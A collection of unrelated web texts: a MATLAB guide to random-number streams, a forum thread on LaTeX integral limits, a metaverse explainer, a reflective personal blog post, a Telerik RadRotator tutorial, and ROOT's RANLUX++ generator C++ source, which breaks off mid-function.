In code that will be called by others, it's safe to generate values using the default stream, with no effect on the statistical properties of other random numbers generated in other parts of the code. But if possible, don't otherwise change the default stream's state or configuration by doing things like resetting or replacing the default stream. It's safest if those kinds of operations are done only by, or at the specific request of, the end user, so that it's clear when they are happening.
When that's not possible, if you need to somehow modify the default stream's state, consider "cleaning up after yourself" by saving and restoring the state before and after your code does whatever it needs to do. For example,
defaultStream = RandStream.getDefaultStream();
savedState = defaultStream.State;
% some use of the default stream and its state
defaultStream.State = savedState;
makes it as if your code did not modify the default stream at all.
Alternatively, consider using a "private stream", one that you create and draw values from without affecting the default stream. For example,
mystream = RandStream('mt19937ar','Seed',sum(100*clock));
x = rand(mystream,100,1);
generates values completely separately from the default stream. That call to rand (the method not the function) uses your private stream, not the default stream. Another possibility is to make the private stream the default, but only temporarily. For example,
mystream = RandStream('mt19937ar','Seed',sum(100*clock));
savedStream = RandStream.getDefaultStream();
RandStream.setDefaultStream(mystream);
% some use of the (new) default stream and its state
RandStream.setDefaultStream(savedStream);
allows your code to use your stream as the default, but also puts things back just as they were originally.
Other Situations?
Do the examples I've covered leave out any situations involving reproducibility of random numbers, or "the opposite or reproducibility", that you've run into? Let me know here.
Published with MATLAB® 7.7
How do I write an integral from a to b in latex?
1. Sep 20, 2012 #1
As the title suggests, I can only see how to write an integral like:
$$F = \int {f(x) dx}$$
But how would I write an integral like the following?
$$\int_a^b {f(x) dx}$$
3. Sep 20, 2012 #2
AlephZero
Put a subscript and a superscript on the \int, e.g. \int_{a}^{b}
4. Sep 20, 2012 #3
Oh, argh! Why didn't I think of that? Anyway, thanks :)
5. Sep 20, 2012 #4
6. Sep 20, 2012 #5
micromass
7. Sep 21, 2012 #6
LCKurtz
Also, if you see an example of what you want to do, just right click on it and select to show math as Tex commands to see the code. You can copy/paste from that.
8. Mar 7, 2013 #7
how do i make the size and font look like that with latex? is that latex or a link to an image?
9. Mar 7, 2013 #8
It's just an image.
10. Mar 7, 2013 #9
jtbell
Staff: Mentor
Here's the actual LaTeX for phosgene's two integrals:
$$F = \int {f(x) dx}$$
$$\int_a^b {f(x) dx}$$
The right-click trick should work on those. Or control-click if you're using a Mac, like I am.
11. Mar 7, 2013 #10
Mark44
Staff: Mentor
As long as the subscripts/superscripts are single characters, as in the above, you can omit the braces around the sub-/superscript. The following will render exactly the same:
\int_a^b
When there are two or more characters (e.g. 2x, -3, etc.) you need the braces around the entire expression, as in this example:
\int_{-2}^{3x}
12. Mar 7, 2013 #11
mine looks smaller for some reason.
[itex]\int_a^b {f(x) dx}[/itex]
13. Mar 7, 2013 #12
robphy
tex [tex] \int_a^b {f(x) dx}[/tex]
itex [itex] \int_a^b {f(x) dx}[/itex]
itex with \displaystyle [itex] \displaystyle\int_a^b {f(x) dx}[/itex]
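Outside the forum's [tex] tags, the same commands work in a plain LaTeX document; a minimal compilable sketch:

```latex
\documentclass{article}
\begin{document}
Indefinite: $F = \int f(x)\,dx$.
With limits: $\displaystyle\int_a^b f(x)\,dx$.
Multi-character limits need braces: $\int_{-2}^{3x} f(x)\,dx$.
\end{document}
```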
What is Metaverse? Learn with the Metaverse’s growth!
What is the Metaverse? Many terms are coined long before the technology behind them matures; we are familiar with concepts like the multiverse and the metaverse, yet the technology that realizes them is still progressing. So what, exactly, is the Metaverse?

What is Metaverse

Technologies such as the Metaverse are now claimed to be capable of facilitating human activities across the economy, from business to marketing, particularly in the setting of the digital age.

We may also think of the Metaverse as a portal to the virtual world, one that we surely view as being intimately tied to the digital world of the future. The digital world is inextricably tied to technology (digital gadgets like mobile phones are necessary in everyday life), and that technology will only intensify the desire to achieve everything digitally in the future.

To grasp what the Metaverse is, we must first learn several things, such as its history and how it works, which depends on the sophistication of this technology. What is the significance of the Metaverse in human life? All of this must be thoroughly understood, and that is why you should continue reading.
What is Metaverse?
The term "metaverse" is a combination of two words: "meta," meaning "beyond," and "universe." Both roots are derived from Greek, and together they suggest something "outside" or "beyond the universe."
The phrase “metaverse” initially arose more than 30 years ago, in the early 1990s. At the time, the metaverse was viewed as a technique of connecting humans (society) to the notion of avatars, which was primarily reliant on technology.
Please keep in mind that there are three major aspects in this metaverse virtual environment.
1. Blockchain technology
2. virtual reality (VR) and artificial intelligence (AI)
3. web 3.0 technologies
There are now a number of well-known corporations involved in the Metaverse realm. From Samsung to Microsoft, Meta (formerly Facebook), Google, and Adidas. In addition, numerous businesses throughout the world are preparing to expand into the virtual world.
How experts define it
Several experts have characterized the metaverse as they see it. According to Weston (2022), "A shared online virtual environment, comparable to video games like Second Life or Pokémon Go, is referred to as the metaverse. It is a realistic three-dimensional world in which individuals interact with one another in real time."
Meanwhile, Stefanik (2022) stated that "the metaverse refers to an online 3D environment that may be accessed via computers, smart devices, augmented reality, and virtual reality headsets." The metaverse principles are based on interaction and involvement, guaranteeing that users can completely immerse themselves in the online world made possible by Metaverse technology.
Metamandril (2022) speculates that the metaverse is the notion of the online world combining with the (physically) actual world to produce something new.
The metaverse idea would usually make use of a few gadgets, such as virtual reality headgear and augmented reality apps. We can later explore new realms in 3D-based settings, that is, three-dimensional environments.
In other words, the notion of this metaverse is only limited by the human imagination.
The Evolution of the Metaverse
In reality, this metaverse is evolving in tandem with the Internet’s more sophisticated evolution. This is because the metaverse exists alongside the virtual world, and its contents can only be “accessible” via the Internet.
Despite the fact that the word “metaverse” has been around since the 1990s, concrete proof will not be available until 2021. Following that, Facebook founder Mark Zuckerberg attempted to expand this virtual world. So, here is a look back at the history of the metaverse notion in the globe.
the growth of the internet
Tim Berners-Lee succeeded in developing the Internet in 1989. The metaverse was born with the early development of the Internet.
For the first time, the phrase “metaverse” arose.
The phrase “metaverse” originally featured in one of Neil Stephenson’s novels, Snow Crash, in 1992. In general, this novel discusses people as avatars who may interact with other avatars in 3D virtual space. This 3D virtual realm is seen as a metaphor or analogy to reality. The work is unique in that it illustrates how 3D virtual space exists.
The start of another life
At Linden Lab, a scientist named Philip Rosedale and his colleagues built Second Life, an online virtual environment, in 2003. Second Life is similar to a multiplayer online role-playing game in general, though Linden Lab claims their world is not a game.
Users in this second life refer to themselves as Residents and have a virtual representation of themselves, called an avatar. The avatar can then interact with places, objects, and even other avatars.
Roblox was made available to the general public.
The notion of the metaverse also applies to the gaming world. Roblox, one of the online gaming platforms, started virtual world games in 2006. Players in the game may construct and share their virtual environment with other players, resulting in transactions. This Roblox game production firm also provides a wide range of game genres, including role-playing, racing, and obstacle course games.
Start of Bitcoin
The presence of bitcoin is unquestionably a component of the metaverse notion. This is due to the fact that bitcoin is a cryptocurrency and blockchain. Later, crypto money would become a transactional instrument in this metaverse, from purchasing land, buildings, clothing, and other avatars.
The term “metaverse” returns.
The notion of the Metaverse was reintroduced to the public in 2011 with Ernest Cline’s novel Ready Player One. Overall, this work depicts reality in 2045 as a dreadful place from which the main character would enter the virtual world and study it. A bit of trivia: the novel was converted into a film with the same title in 2018.
Oculus production
Facebook purchased the hardware and virtual reality (VR) platform startup Oculus in 2014, because VR technology would subsequently become a crucial element in building the Metaverse universe. Oculus makes most of the head-mounted display devices that render the virtual world.
Decentraland has been released.
One of the Metaverse systems, Decentraland, was successfully released in 2015. It was developed by Esteban Ordano and Ari Meilich, and its virtual worlds hold a lot of digital assets. This VR platform can also be used to purchase NFTs (non-fungible tokens).
The game Pokemon Go debuted.
Do you like the Pokémon Go game? What lengths have you gone to in order to collect Pokémon? The game is built on augmented reality (AR) technology, and it demonstrates that we have already "tasted" the notion of the metaverse through the gaming industry.
fortnite
The Fortnite game, like Pokémon Go, is themed on the Metaverse reality. Unfortunately, you cannot obtain this game by downloading it from the PlayStore or AppStore, but only by visiting the website.
Axie Infinity
In addition to Pokémon Go and Fortnite, Axie Infinity is a game that continued the idea of the Metaverse universe in 2018.
Two technological companies are developing the metaverse.
In 2021, two of the world’s largest technological corporations announced the creation of a metaverse universe. Yes, Microsoft and Facebook are the two technological corporations.
Microsoft is launching Mesh, a technology built for virtual collaboration across numerous devices. Meanwhile, Facebook has renamed its parent company “Meta” and intends to focus on constructing the metaverse virtual world.
How does the metaverse function?
With a little knowledge, it is relatively simple to join the realm of the Metaverse: just log in and register with one of the available platforms, such as Decentraland. Once you have registered, you can enter the Metaverse with your current device.
As previously stated, this metaverse virtual environment may be accessed using specialized equipment such as headsets and virtual reality glasses, plus an internet connection. It works in practically the same way as when we play a game.
Learn about Metaverse’s efforts.
First, prepare some of these specialized instruments ahead of time. Remember that the internet connection should be smooth so that you can enjoy the virtual world without stuttering. The devices, both software and hardware, will eventually interpret human movements, voices, and words. Once the gadget is ready, we simply enter the virtual world and perform the same activities we do in real life, such as communicating, shopping, transacting, and buying.

Aside from the two gadgets already mentioned, there are others such as haptic gloves, robotic hands, and VR eyewear. These gadgets are admittedly rather costly, considering their sophistication and quality.
So, that is what the Metaverse is, how it operates, and the history of its development. Do you want to enter this virtual world with the assistance of such a device?
How many blogs? How many Facebook accounts?
How many social media entities does it take to spread one out over our species?
I am limited, having just five main email addresses I use actively, and maybe half a dozen blogs I maintain, only three Facebook profiles I update, not to forget the Pinterest and other social media sites that are updated automagically.
In the midst of that, I live and breathe.
What makes a greenhouse a living space or vice versa?
Can the word “punk” and the phrase “Waffle House” exist together? Yes, at Aretha Frankenstein’s in Chattanooga.
I say I want to be a hermit but I easily let a friend (well, not just any friend (the friend (she knows who she is))) get me back on social media with the only hesitation a five-hour daytime sleeping period to keep me on schedule with my night shift job, even on summer holiday.
I look down at my hands, observing the thinning skin, the early knotted knuckle signs of arthritis, the freckles and sunspots, wondering: will I live to 6th May 2050?
My thought structure passes through many phase shifts and subsets, pausing in Venn diagrams of interconnectedness, looking in all directions, asking myself: why am I asking myself questions, as if I’m not here with myself seeing me ask questions for which I already know the answers or already know I don’t know the answers?
Why do I pretend there is an Other/Not-Me which needs to see I already know the answers or already know I don’t know the answers?
Who am I? Who are we?
No, really.
When we know everything is grounded in reality but believe in magic/miracles/the unexplainable anyway…
Why?
We carry forward the successful thought patterns of our ancestors, regardless of its practical application today.
Sometimes as history (lest we forget the lessons our ancestors learned), sometimes as fairy tales/fantasy (as entertainment), sometimes as integral parts of our thought sets (because what worked in the past still works in the present/near future).
And if we could prove that thoughts do not exist in a vacuum, then what?
How do we extinguish the illusion of an independent person having independent thoughts?
How do we show that every one of us is just/miraculously a localised spinoff of stardust in motion?
How often should we tell, rather than show?
How long will it take for everyone to see the obvious?
And for/to what purpose?
Saving the species from/for itself, even if species is a concept that should lose its illusion powers?
What does a benign universe provide itself in the localised forms taken in our shapes?
Other than randomness?
We are random, no worries, there, because we also do not exist, despite ancestral teaching to the contrary.
It is here that a good joke is inserted to take our thought trails in a lighthearted direction:
Charles Schulz — “My life has no purpose, no direction, no aim, no meaning, and yet I’m happy. I can’t figure it out. What am I doing right?”
Find a control inside the ItemTemplate on the client
1. Telerik Admin
Posted 28 Jul 2009
Requirements

RadControls version: RadControls for ASP.NET AJAX
.NET version: 2.x and 3.x
Visual Studio version: 2005/2008
Programming language: JavaScript
Browser support: all browsers supported by RadControls
GET REFERENCE TO AN ELEMENT INSIDE THE ITEM TEMPLATE
In some scenarios we need to get a reference to an item that is inside the Rotator's item template. For example we will get a reference to two types of objects - an HTML Image and an asp:Image control.
First we need to get a reference to the wrapper element. This element is used in the code in order to build the IDs of the controls that we want to refer to. The RadRotator's ItemTemplate is an ITemplate and the elements inside are renamed. For example if we have an asp:Image with ID="Image1" inside the template of a RadRotator with ID="RadRotator1", the ID of the image in the first item becomes RadRotator1_i0_AspImage1
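That renaming is just the naming container prefixing the control's ID. As a plain-JavaScript sketch (the function and variable names here are mine, not part of the Telerik API), the mangled client-side ID can be built like this:

```javascript
// Build the client-side ID of a control inside a RadRotator ItemTemplate:
// "<rotator id>_i<item index>_<server-side control id>".
function buildTemplateControlId(rotatorId, itemIndex, controlId) {
    return rotatorId + "_i" + itemIndex + "_" + controlId;
}

console.log(buildTemplateControlId("RadRotator1", 0, "AspImage1")); // RadRotator1_i0_AspImage1
```

The helper functions below follow the same pattern, using the wrapper element's ID as the prefix.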
Getting the wrapper element :
function getWrapperElement(rotatorItem)
{
    var itemElem = rotatorItem.get_element();
    var wrapper = itemElem.firstChild;
    return wrapper;
}
Let us have the following setup, for example:
<div class="divBorder" style="float: left;">
    <img id="HtmlImagePreview" src="" alt="HtmlImage" />
</div>
<div style="float: left;">
    <telerik:RadRotator ID="RadRotator1" runat="server" DataSourceID="XmlDataSource1"
        Width="100" ItemWidth="100" Height="200" ItemHeight="200" FrameDuration="5000"
        ScrollDuration="2000" OnClientItemClicked="OnRotatorItemClicked">
        <ItemTemplate>
            <div style="width: 100px; height: 100px;">
                <img id="HtmlImage1" src='<%# XPath("ImageURL") %>' alt="" />
            </div>
            <div style="width: 100px; height: 100px;">
                <asp:Image ID="AspImage1" runat="server" ImageUrl='<%# XPath("ImageURL") %>' AlternateText="IMAGE" />
            </div>
        </ItemTemplate>
    </telerik:RadRotator>
</div>
<div class="divBorder" style="float: left;">
    <asp:Image ID="AspImagePreview" runat="server" ImageUrl="" AlternateText="AspImage" />
</div>
We implement two functions that can be used to find a specific item inside the ItemTemplate
1. Get a reference to an HTML element that is inside the ItemTemplate
function findHtmlElement(id, wrapperElement)
{
    // Get the image
    var image = $get(id, wrapperElement);
    return image;
}
2. Get a reference to an Asp control that is inside the ItemTemplate :
function findAspControl(id, wrapperElement)
{
    // Get the control
    var control = $get(wrapperElement.id + "_" + id, wrapperElement);
    return control;
}
Note that in case you need to find an AJAX-enabled control, you need to use the $find() function instead of the $get() one.
Then we could use these functions inside the OnClientItemClicked handler (for example) of the RadRotator control and get references to the elements that are inside the currently clicked rotator's item :
function OnRotatorItemClicked(oRotator, args)
{
    // Get the wrapper element
    var wrapper = getWrapperElement(args.get_item());

    // Find an asp control
    var aspImageInsideTemplate = findAspControl("AspImage1", wrapper);
    var aspImagePreview = $get("<%= AspImagePreview.ClientID %>");
    aspImagePreview.src = aspImageInsideTemplate.src;

    // Find an HTML element
    var htmlImageInsideTemplate = findHtmlElement("HtmlImage1", wrapper);
    var htmlImagePreview = document.getElementById("HtmlImagePreview");
    htmlImagePreview.src = htmlImageInsideTemplate.src;
}
RanluxppEngineImpl.cxx
// @(#)root/mathcore:$Id$
// Author: Jonas Hahnfeld 11/2020

/*************************************************************************
 * Copyright (C) 1995-2021, Rene Brun and Fons Rademakers.               *
 * All rights reserved.                                                  *
 *                                                                       *
 * For the licensing terms see $ROOTSYS/LICENSE.                         *
 * For the list of contributors see $ROOTSYS/README/CREDITS.             *
 *************************************************************************/

/** \class ROOT::Math::RanluxppEngine
Implementation of the RANLUX++ generator

RANLUX++ is an LCG equivalent of RANLUX using 576 bit numbers.

The idea of the generator (such as the initialization method) and the algorithm
for the modulo operation are described in
A. Sibidanov, *A revision of the subtract-with-borrow random number generators*,
*Computer Physics Communications*, 221(2017), 299-303,
preprint https://arxiv.org/pdf/1705.03123.pdf

The code is loosely based on the Assembly implementation by A. Sibidanov
available at https://github.com/sibidanov/ranluxpp/.

Compared to the original generator, this implementation contains a fix to ensure
that the modulo operation of the LCG always returns the smallest value congruent
to the modulus (based on notes by M. Lüscher). Also, the generator converts the
LCG state back to RANLUX numbers (implementation based on notes by M. Lüscher).
This avoids a bias in the generated numbers because the upper bits of the LCG
state, that is smaller than the modulus \f$ m = 2^{576} - 2^{240} + 1 \f$ (not
a power of 2!), have a higher probability of being 0 than 1. And finally, this
implementation draws 48 random bits for each generated floating point number
(instead of 52 bits as in the original generator) to maintain the theoretical
properties from understanding the original transition function of RANLUX as a
chaotic dynamical system.
*/

#include "Math/RanluxppEngine.h"

#include "ranluxpp/mulmod.h"
#include "ranluxpp/ranlux_lcg.h"

#include <cassert>
#include <cstdint>

namespace {

// Variable templates are a feature of C++14, use the older technique of having
// a static member in a template class.

// The coefficients have been determined using Python, and in parts compared to the values given by Sibidanov.
//
// >>> def print_hex(a):
// ...     while a > 0:
// ...         print('{0:#018x}'.format(a & 0xffffffffffffffff))
// ...         a >>= 64
// ...
// >>> m = 2 ** 576 - 2 ** 240 + 1
// >>> a = m - (m - 1) // 2 ** 24
// >>> kA = pow(a, <w>, m)
// >>> print_hex(kA)

template <int p>
struct RanluxppData;

template <>
struct RanluxppData<24> {
   static const uint64_t kA[9];
};
// Also given by Sibidanov
const uint64_t RanluxppData<24>::kA[] = {
   0x0000000000000000, 0x0000000000000000, 0x0000000000010000, 0xfffe000000000000, 0xffffffffffffffff,
   0xffffffffffffffff, 0xffffffffffffffff, 0xfffffffeffffffff, 0xffffffffffffffff,
};

template <>
struct RanluxppData<218> {
   static const uint64_t kA[9];
};
const uint64_t RanluxppData<218>::kA[] = {
   0xf445fffffffffd94, 0xfffffd74ffffffff, 0x000000000ba5ffff, 0xfc76000000000942, 0xfffffaaaffffffff,
   0x0000000000b0ffff, 0x027b0000000007d1, 0xfffff96000000000, 0xfffffffff8e4ffff,
};

template <>
struct RanluxppData<223> {
   static const uint64_t kA[9];
};
// Also given by Sibidanov
const uint64_t RanluxppData<223>::kA[] = {
   0x0000000ba6000000, 0x0a00000000094200, 0xffeef0fffffffffa, 0xfffffffe25ffffff, 0x7b0000000007d0ff,
   0xfff9600000000002, 0xfffffff8e4ffffff, 0xba00000000026cff, 0x00028b000000000b,
};

template <>
struct RanluxppData<389> {
   static const uint64_t kA[9];
};
// Also given by Sibidanov
const uint64_t RanluxppData<389>::kA[] = {
   0x00002ecac9000000, 0x740000002c389600, 0xb9c8a6ffffffe525, 0xfffff593cfffffff, 0xab0000001e93f2ff,
   0xe4ab160000000d92, 0xffffdf6604ffffff, 0x020000000b9242ff, 0x0df0600000002ee0,
};

template <>
struct RanluxppData<404> {
   static const uint64_t kA[9];
};
const uint64_t RanluxppData<404>::kA[] = {
   0x2eabffffffc9d08b, 0x00012612ffffff99, 0x0000007c3ebe0000, 0x353600000047bba1, 0xffd3c769ffffffd1,
   0x0000001ada8bffff, 0x6c30000000463759, 0xffb2a1440000000a, 0xffffffc634beffff,
};

template <>
struct RanluxppData<778> {
   static const uint64_t kA[9];
};
const uint64_t RanluxppData<778>::kA[] = {
   0x872de42d9dca512b, 0xdbf015ea1662f8a0, 0x01f48f0d28482e96, 0x392fca0b3be2ae04, 0xed00881af896ce54,
   0x14f0a768664013f3, 0x9489f52deb1f7f80, 0x72139804e09c0f37, 0x2146b0bb92a2f9a4,
};

template <>
struct RanluxppData<794> {
   static const uint64_t kA[9];
};
const uint64_t RanluxppData<794>::kA[] = {
   0x428df7227a2ca7c9, 0xde32225faaa74b1a, 0x4b9d965ca1ebd668, 0x78d15f59e58e2aff, 0x240fea15e99d075f,
   0xfe0b70f2d7b7d169, 0x75a535f4c41d51fb, 0x1a5ef0b7233b93e1, 0xbc787ca783d5d5a9,
};

template <>
struct RanluxppData<2048> {
   static const uint64_t kA[9];
};
// Also given by Sibidanov
const uint64_t RanluxppData<2048>::kA[] = {
   0xed7faa90747aaad9, 0x4cec2c78af55c101, 0xe64dcb31c48228ec, 0x6d8a15a13bee7cb0, 0x20b2ca60cb78c509,
   0x256c3d3c662ea36c, 0xff74e54107684ed2, 0x492edfcc0cc8e753, 0xb48c187cf5b22097,
};

} // end anonymous namespace

namespace ROOT {
namespace Math {

template <int w, int p, int u>
class RanluxppEngineImpl {
   // Needs direct access to private members to initialize its four states.
   friend class RanluxppCompatEngineLuescherImpl<w, p>;

private:
   uint64_t fState[9]; ///< RANLUX state of the generator
   unsigned fCarry;    ///< Carry bit of the RANLUX state
   int fPosition = 0;  ///< Current position in bits

   static constexpr const uint64_t *kA = RanluxppData<p>::kA;
   static constexpr int kMaxPos = (u == 0) ? 9 * 64 : u * w;
   static_assert(kMaxPos <= 576, "maximum position larger than 576 bits");

   /// Advance with given multiplier
   void Advance(const uint64_t *a)
   {
      uint64_t lcg[9];
      to_lcg(fState, fCarry, lcg);
      mulmod(a, lcg);
      to_ranlux(lcg, fState, fCarry);
      fPosition = 0;
   }

   /// Produce next block of random bits
   void Advance()
   {
      Advance(kA);
   }

   /// Skip 24 RANLUX numbers
   void Skip24()
   {
      Advance(RanluxppData<24>::kA);
   }

public:
   /// Return the next random bits, generate a new block if necessary
   uint64_t NextRandomBits()
   {
      if (fPosition + w > kMaxPos) {
         Advance();
      }

      int idx = fPosition / 64;
      int offset = fPosition % 64;
      int numBits = 64 - offset;

      uint64_t bits = fState[idx] >> offset;
      if (numBits < w) {
         bits |= fState[idx + 1] << numBits;
      }
      bits &= ((uint64_t(1) << w) - 1);

      fPosition += w;
      assert(fPosition <= kMaxPos && "position out of range!");

      return bits;
   }

   /// Return a floating point number, converted from the next random bits.
   double NextRandomFloat()
   {
      static constexpr double div = 1.0 / (uint64_t(1) << w);
      uint64_t bits = NextRandomBits();
      return bits * div;
   }

   /// Initialize and seed the state of the generator as in James' implementation
   void SetSeedJames(uint64_t s)
   {
      // Multiplicative Congruential generator using formula constants of L'Ecuyer
      // as described in "A review of pseudorandom number generators" (Fred James)
      // published in Computer Physics Communications 60 (1990) pages 329-344.
      int64_t seed = s;
      auto next = [&]() {
         const int a = 0xd1a4, b = 0x9c4e, c = 0x2fb3, d = 0x7fffffab;
         int64_t k = seed / a;
         seed = b * (seed - k * a) - k * c;
         if (seed < 0) seed += d;
         return seed & 0xffffff;
      };

      // Iteration is reversed because the first number from the MCG goes to the
      // highest position.
      for (int i = 6; i >= 0; i -= 3) {
         uint64_t r[8];
         for (int j = 0; j < 8; j++) {
            r[j] = next();
         }

         fState[i+0] = r[7] + (r[6] << 24) + (r[5] << 48);
         fState[i+1] = (r[5] >> 16) + (r[4] << 8) + (r[3] << 32) + (r[2] << 56);
         fState[i+2] = (r[2] >> 8) + (r[1] << 16) + (r[0] << 40);
      }
      fCarry = !seed;

      Skip24();
   }

   /// Initialize and seed the state of the generator as in gsl_rng_ranlx*
   void SetSeedGsl(uint32_t s, bool ranlxd)
   {
      if (s == 0) {
         // The default seed for gsl_rng_ranlx* is 1.
         s = 1;
      }

      uint32_t bits = s;
      auto next_bit = [&]() {
         int b13 = (bits >> 18) & 0x1;
         int b31 = bits & 0x1;
         uint32_t bn = b13 ^ b31;
         bits = (bn << 30) + (bits >> 1);
         return b31;
      };
      auto next = [&]() {
         uint64_t ix = 0;
         for (int i = 0; i < 48; i++) {
            int iy = next_bit();
            if (ranlxd) {
               iy = (iy + 1) % 2;
            }
            ix = 2 * ix + iy;
         }
         return ix;
      };

      for (int i = 0; i < 9; i += 3) {
         uint64_t r[4];
         for (int j = 0; j < 4; j++) {
            r[j] = next();
         }

         fState[i+0] = r[0] + (r[1] << 48);
         fState[i+1] = (r[1] >> 16) + (r[2] << 32);
         fState[i+2] = (r[2] >> 32) + (r[3] << 16);
      }

      fCarry = 0;
      fPosition = 0;
      Advance();
   }

   /// Initialize and seed the state of the generator as proposed by Sibidanov
   void SetSeedSibidanov(uint64_t s)
   {
      uint64_t lcg[9];
      lcg[0] = 1;
      for (int i = 1; i < 9; i++) {
         lcg[i] = 0;
      }

      uint64_t a_seed[9];
      // Skip 2 ** 96 states.
      powermod(kA, a_seed, uint64_t(1) << 48);
      powermod(a_seed, a_seed, uint64_t(1) << 48);
      // Skip another s states.
      powermod(a_seed, a_seed, s);
      mulmod(a_seed, lcg);

      to_ranlux(lcg, fState, fCarry);
      fPosition = 0;
   }

   /// Initialize and seed the state of the generator as described by the C++ standard
   void SetSeedStd24(uint64_t s)
   {
      // Seed LCG with given parameters.
      uint64_t seed = s;
      const uint64_t a = 40014, m = 2147483563;
      auto next = [&]() {
         seed = (a * seed) % m;
         return seed & 0xffffff;
      };

      for (int i = 0; i < 9; i += 3) {
         uint64_t r[8];
         for (int j = 0; j < 8; j++) {
            r[j] = next();
         }

         fState[i+0] = r[0] + (r[1] << 24) + (r[2] << 48);
         fState[i+1] = (r[2] >> 16) + (r[3] << 8) + (r[4] << 32) + (r[5] << 56);
         fState[i+2] = (r[5] >> 8) + (r[6] << 16) + (r[7] << 40);
      }
      fCarry = !seed;

      Skip24();
   }

   /// Initialize and seed the state of the generator as described by the C++ standard
   void SetSeedStd48(uint64_t s)
   {
      // Seed LCG with given parameters.
      uint64_t seed = s;
      const uint64_t a = 40014, m = 2147483563;
      auto next = [&]() {
         seed = (a * seed) % m;
         uint64_t result = seed;
         seed = (a * seed) % m;
         result += seed << 32;
         return result & 0xffffffffffff;
      };

      for (int i = 0; i < 9; i += 3) {
         uint64_t r[4];
         for (int j = 0; j < 4; j++) {
            r[j] = next();
         }

         fState[i+0] = r[0] + (r[1] << 48);
         fState[i+1] = (r[1] >> 16) + (r[2] << 32);
         fState[i+2] = (r[2] >> 32) + (r[3] << 16);
      }
      fCarry = !seed;

      Skip24();
   }

   /// Skip `n` random numbers without generating them
   void Skip(uint64_t n)
   {
      int left = (kMaxPos - fPosition) / w;
      assert(left >= 0 && "position was out of range!");
      if (n < (uint64_t)left) {
         // Just skip the next few entries in the currently available bits.
         fPosition += n * w;
         assert(fPosition <= kMaxPos && "position out of range!");
         return;
      }

      n -= left;
      // Need to advance and possibly skip over blocks.
      int nPerState = kMaxPos / w;
      int skip = (n / nPerState);

      uint64_t a_skip[9];
      powermod(kA, a_skip, skip + 1);

      uint64_t lcg[9];
      to_lcg(fState, fCarry, lcg);
      mulmod(a_skip, lcg);
      to_ranlux(lcg, fState, fCarry);

      // Potentially skip numbers in the freshly generated block.
      int remaining = n - skip * nPerState;
      assert(remaining >= 0 && "should not end up at a negative position!");
      fPosition = remaining * w;
      assert(fPosition <= kMaxPos && "position out of range!");
   }
};

template <int p>
RanluxppEngine<p>::RanluxppEngine(uint64_t seed) : fImpl(new RanluxppEngineImpl<48, p>)
{
   this->SetSeed(seed);
}

template <int p>
RanluxppEngine<p>::~RanluxppEngine() = default;

template <int p>
double RanluxppEngine<p>::Rndm()
{
   return (*this)();
}

template <int p>
double RanluxppEngine<p>::operator()()
{
   return fImpl->NextRandomFloat();
}

template <int p>
uint64_t RanluxppEngine<p>::IntRndm()
{
   return fImpl->NextRandomBits();
}

template <int p>
void RanluxppEngine<p>::SetSeed(uint64_t seed)
{
   fImpl->SetSeedSibidanov(seed);
}

template <int p>
void RanluxppEngine<p>::Skip(uint64_t n)
{
   fImpl->Skip(n);
}

template class RanluxppEngine<24>;
template class RanluxppEngine<2048>;


template <int p>
RanluxppCompatEngineJames<p>::RanluxppCompatEngineJames(uint64_t seed) : fImpl(new RanluxppEngineImpl<24, p>)
{
   this->SetSeed(seed);
}

template <int p>
RanluxppCompatEngineJames<p>::~RanluxppCompatEngineJames() = default;

template <int p>
double RanluxppCompatEngineJames<p>::Rndm()
{
   return (*this)();
}

template <int p>
double RanluxppCompatEngineJames<p>::operator()()
{
   return fImpl->NextRandomFloat();
}

template <int p>
uint64_t RanluxppCompatEngineJames<p>::IntRndm()
{
   return fImpl->NextRandomBits();
}

template <int p>
void RanluxppCompatEngineJames<p>::SetSeed(uint64_t seed)
{
   fImpl->SetSeedJames(seed);
}

template <int p>
void RanluxppCompatEngineJames<p>::Skip(uint64_t n)
{
   fImpl->Skip(n);
}

template class RanluxppCompatEngineJames<223>;
template class RanluxppCompatEngineJames<389>;


template <int p>
RanluxppCompatEngineGslRanlxs<p>::RanluxppCompatEngineGslRanlxs(uint64_t seed) : fImpl(new RanluxppEngineImpl<24, p>)
{
   this->SetSeed(seed);
}

template <int p>
RanluxppCompatEngineGslRanlxs<p>::~RanluxppCompatEngineGslRanlxs() = default;

template <int p>
double RanluxppCompatEngineGslRanlxs<p>::Rndm()
{
   return (*this)();
}

template <int p>
double RanluxppCompatEngineGslRanlxs<p>::operator()()
{
   return fImpl->NextRandomFloat();
}

template <int p>
uint64_t RanluxppCompatEngineGslRanlxs<p>::IntRndm()
{
   return fImpl->NextRandomBits();
}

template <int p>
void RanluxppCompatEngineGslRanlxs<p>::SetSeed(uint64_t seed)
{
   fImpl->SetSeedGsl(seed, /*ranlxd=*/false);
}

template <int p>
void RanluxppCompatEngineGslRanlxs<p>::Skip(uint64_t n)
{
   fImpl->Skip(n);
}

template class RanluxppCompatEngineGslRanlxs<218>;
template class RanluxppCompatEngineGslRanlxs<404>;
template class RanluxppCompatEngineGslRanlxs<794>;


template <int p>
RanluxppCompatEngineGslRanlxd<p>::RanluxppCompatEngineGslRanlxd(uint64_t seed) : fImpl(new RanluxppEngineImpl<48, p>)
{
   this->SetSeed(seed);
}

template <int p>
RanluxppCompatEngineGslRanlxd<p>::~RanluxppCompatEngineGslRanlxd() = default;

template <int p>
double RanluxppCompatEngineGslRanlxd<p>::Rndm()
{
   return (*this)();
}

template <int p>
double RanluxppCompatEngineGslRanlxd<p>::operator()()
{
   return fImpl->NextRandomFloat();
}

template <int p>
uint64_t RanluxppCompatEngineGslRanlxd<p>::IntRndm()
{
   return fImpl->NextRandomBits();
}

template <int p>
void RanluxppCompatEngineGslRanlxd<p>::SetSeed(uint64_t seed)
{
   fImpl->SetSeedGsl(seed, /*ranlxd=*/true);
}

template <int p>
void RanluxppCompatEngineGslRanlxd<p>::Skip(uint64_t n)
{
   fImpl->Skip(n);
}

template class RanluxppCompatEngineGslRanlxd<404>;
template class RanluxppCompatEngineGslRanlxd<794>;


template <int w, int p>
class RanluxppCompatEngineLuescherImpl {

private:
   RanluxppEngineImpl<w, p> fStates[4]; ///< The states of this generator
   int fNextState = 0;                  ///< The index of the next state

public:
   /// Return the next random bits, generate a new block if necessary
   uint64_t NextRandomBits()
   {
      uint64_t bits = fStates[fNextState].NextRandomBits();
      fNextState = (fNextState + 1) % 4;
      return bits;
   }

   /// Return a floating point number, converted from the next random bits.
   double NextRandomFloat()
   {
      double number = fStates[fNextState].NextRandomFloat();
      fNextState = (fNextState + 1) % 4;
      return number;
   }

   /// Initialize and seed the state of the generator as in Lüscher's ranlxs
